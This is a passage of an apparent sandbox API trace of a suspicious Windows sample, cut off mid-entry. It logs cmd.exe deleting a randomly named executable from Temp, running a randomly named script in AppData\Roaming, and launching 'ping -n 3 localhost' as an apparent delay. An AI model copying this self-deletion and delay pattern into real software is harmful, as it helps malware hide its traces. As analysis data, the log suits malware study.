WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x14f008, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f008*=0x3a) returned 1 [0178.417] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f03c | out: _Buffer="\r\n") returned 2 [0178.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.417] GetFileType (hFile=0x7) returned 0x2 [0178.417] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.417] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14effc | out: lpMode=0x14effc) returned 1 [0178.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.417] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f028, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f028*=0x2) returned 1 [0178.418] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0178.418] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0178.418] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0178.418] GetConsoleTitleW (in: lpConsoleTitle=0x14ebac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.418] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14dc24, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14dc28, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14dc24*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0178.418] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0178.418] _wcsicmp (_String1="WsPgAGWN.exe", _String2=".") returned 73 [0178.418] _wcsicmp (_String1="WsPgAGWN.exe", _String2="..") returned 73 [0178.418] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: 
"c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0xffffffff [0178.418] GetLastError () returned 0x2 [0178.418] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0178.418] _wcsicmp (_String1="WsPgAGWN.exe", _String2=".") returned 73 [0178.419] _wcsicmp (_String1="WsPgAGWN.exe", _String2="..") returned 73 [0178.419] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0xffffffff [0178.419] GetLastError () returned 0x2 [0178.419] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", fInfoLevelId=0x0, lpFindFileData=0x170554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x170554) returned 0xffffffff [0178.419] GetLastError () returned 0x2 [0178.419] _get_osfhandle (_FileHandle=2) returned 0xb [0178.419] GetFileType (hFile=0xb) returned 0x2 [0178.419] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0178.419] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14e624 | out: lpMode=0x14e624) returned 1 [0178.419] _get_osfhandle (_FileHandle=2) returned 0xb [0178.419] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14e658 | out: lpConsoleScreenBufferInfo=0x14e658) returned 1 [0178.420] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0178.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.420] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.420] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.420] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.420] GetConsoleMode (in: 
hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.421] SetConsoleInputExeNameW () returned 0x1 [0178.421] GetConsoleOutputCP () returned 0x1b5 [0178.421] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.421] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.421] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\cbffjy09.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14efe4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0178.421] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0178.421] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.421] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.421] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.421] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.422] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14efc8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x14efc8*=0x0, lpOverlapped=0x0) returned 1 [0178.422] GetLastError () returned 0x0 [0178.422] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.422] GetFileType (hFile=0x54) returned 0x1 [0178.422] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.422] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.422] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.422] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.422] ReadFile (in: hFile=0x54, 
lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14efac, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x14efac*=0x0, lpOverlapped=0x0) returned 1 [0178.422] GetLastError () returned 0x0 [0178.422] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.422] GetFileType (hFile=0x54) returned 0x1 [0178.422] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.422] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.422] longjmp () [0178.422] _tell (_FileHandle=3) returned 145 [0178.422] _close (_FileHandle=3) returned 0 [0178.422] CmdBatNotification () returned 0x0 [0178.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.423] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.423] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.423] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.423] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.423] SetConsoleInputExeNameW () returned 0x1 [0178.423] GetConsoleOutputCP () returned 0x1b5 [0178.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.423] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.423] exit (_Code=0) Process: id = "314" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16c20" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "313" os_parent_pid = "0xbf8" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24211 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24212 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24213 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24214 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24215 start_va = 0x330000 end_va = 0x337fff entry_point = 0x330000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 24216 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24217 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24218 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24219 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 24220 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24221 start_va = 0x10000 end_va = 0x1ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24222 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24223 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24224 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 24225 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24226 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24227 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24228 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24229 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24230 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: 
"c:\\windows\\system32\\sechost.dll") Region: id = 24231 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24232 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 24233 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 24234 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 24235 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24236 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24237 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24238 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24239 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") 
Region: id = 24240 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 24241 start_va = 0xd0000 end_va = 0x197fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 24242 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24243 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24244 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 24245 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 24246 start_va = 0x1c0000 end_va = 0x1c2fff entry_point = 0x1c0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 24247 start_va = 0x210000 end_va = 0x310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 24248 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 24249 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 24250 start_va = 0x4e0000 end_va = 0x10dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 24251 start_va = 0x10e0000 end_va = 0x13aefff entry_point = 0x10e0000 
region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 24252 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 24253 start_va = 0x13b0000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 24254 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 24255 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 24256 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 24257 start_va = 0x1470000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 24258 start_va = 0x13d0000 end_va = 0x140ffff entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 24259 start_va = 0x1430000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 24260 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24261 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = 
"\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 24262 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 24263 start_va = 0x15e0000 end_va = 0x17bffff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 24264 start_va = 0x14f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 24265 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 24266 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 24267 start_va = 0x16d0000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 24268 start_va = 0x1780000 end_va = 0x17bffff entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 24269 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 417 os_tid = 0xaac [0175.484] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f7d4 | out: lpSystemTimeAsFileTime=0x20f7d4*(dwLowDateTime=0x9e7eece0, dwHighDateTime=0x1d440a9)) [0175.484] GetCurrentProcessId () returned 0xa70 [0175.484] GetCurrentThreadId () returned 0xaac [0175.484] GetTickCount () returned 0x32ff5 [0175.484] QueryPerformanceCounter (in: lpPerformanceCount=0x20f7cc | out: lpPerformanceCount=0x20f7cc*=23227339198) returned 1 [0175.485] GetModuleHandleA (lpModuleName=0x0) returned 0x330000 [0175.485] __set_app_type (_Type=0x1) [0175.485] __p__fmode () returned 0x76b331f4 [0175.485] 
__p__commode () returned 0x76b331fc [0175.485] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x332ae1) returned 0x0 [0175.485] __getmainargs (in: _Argc=0x3350d4, _Argv=0x3350dc, _Env=0x3350d8, _DoWildCard=0, _StartInfo=0x3350e8 | out: _Argc=0x3350d4, _Argv=0x3350dc, _Env=0x3350d8) returned 0 [0175.485] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.485] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.485] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x335440 | out: lpWSAData=0x335440) returned 0 [0175.491] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x20f264 | out: phkResult=0x20f264*=0x58) returned 0x0 [0175.491] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x20f258, lpData=0x20f260, lpcbData=0x20f25c*=0x4 | out: lpType=0x20f258*=0x0, lpData=0x20f260*=0x0, lpcbData=0x20f25c*=0x4) returned 0x2 [0175.491] RegCloseKey (hKey=0x58) returned 0x0 [0175.491] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x20f22c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x20f254 | out: ppResult=0x20f254*=0x0) returned 11001 [0175.491] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x20f22c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x20f254 | out: ppResult=0x20f254*=0x4046f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x4047b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4047e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x403a18*(sa_family=2, sin_port=0x0, 
sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0175.505] FreeAddrInfoW (pAddrInfo=0x4046f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x4047b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4047e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x403a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0175.505] Icmp6CreateFile () returned 0x408b40 [0175.508] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x404830 [0175.508] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x40ebb0 [0175.508] getnameinfo (in: pSockaddr=0x3355e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x20f754, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0175.508] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x20f254, nSize=0x0, Arguments=0x20f250 | out: lpBuffer="XH@") returned 0x19 [0175.509] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x404858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0175.509] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0175.509] _write (in: _FileHandle=1, _Buf=0x404858*, _MaxCharCount=0x19 | out: _Buf=0x404858*) returned 25 [0175.509] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0175.509] LocalFree (hMem=0x404858) returned 0x0 [0175.509] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x20f258, nSize=0x0, Arguments=0x20f254 | out: lpBuffer="XH@") returned 0x18 [0175.509] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x404858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of 
data:\r\n") returned 1 [0175.509] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0175.509] _write (in: _FileHandle=1, _Buf=0x404858*, _MaxCharCount=0x18 | out: _Buf=0x404858*) returned 24 [0175.509] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0175.509] LocalFree (hMem=0x404858) returned 0x0 [0175.509] SetConsoleCtrlHandler (HandlerRoutine=0x3317ca, Add=1) returned 1 [0175.509] Icmp6SendEcho2 (in: IcmpHandle=0x408b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x20f2d0, DestinationAddress=0x3355e0, RequestData=0x404830, RequestSize=0x20, RequestOptions=0x20f280, ReplyBuffer=0x40ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x40ebb0) returned 0x1 [0175.510] getnameinfo (in: pSockaddr=0x3355e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x20f754, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0175.510] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x20f258, nSize=0x0, Arguments=0x20f254 | out: lpBuffer=" Q@") returned 0x10 [0175.510] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x405120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0175.510] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0175.510] _write (in: _FileHandle=1, _Buf=0x405120*, _MaxCharCount=0x10 | out: _Buf=0x405120*) returned 16 [0175.511] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0175.511] LocalFree (hMem=0x405120) returned 0x0 [0175.511] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer="\x10<@") returned 0x9 [0175.511] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x403c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0175.511] _setmode (_FileHandle=1, 
_Mode=32768) returned 16384 [0175.511] _write (in: _FileHandle=1, _Buf=0x403c10*, _MaxCharCount=0x9 | out: _Buf=0x403c10*) returned 9 [0175.511] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0175.511] LocalFree (hMem=0x403c10) returned 0x0 [0175.511] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer=" \x8f@") returned 0x2 [0175.511] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x408f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0175.511] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0175.511] _write (in: _FileHandle=1, _Buf=0x408f20*, _MaxCharCount=0x2 | out: _Buf=0x408f20*) returned 2 [0175.511] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0175.511] LocalFree (hMem=0x408f20) returned 0x0 [0175.511] Sleep (dwMilliseconds=0x3e8) [0176.718] Icmp6SendEcho2 (in: IcmpHandle=0x408b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x20f2d0, DestinationAddress=0x3355e0, RequestData=0x404830, RequestSize=0x20, RequestOptions=0x20f280, ReplyBuffer=0x40ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x40ebb0) returned 0x1 [0176.790] getnameinfo (in: 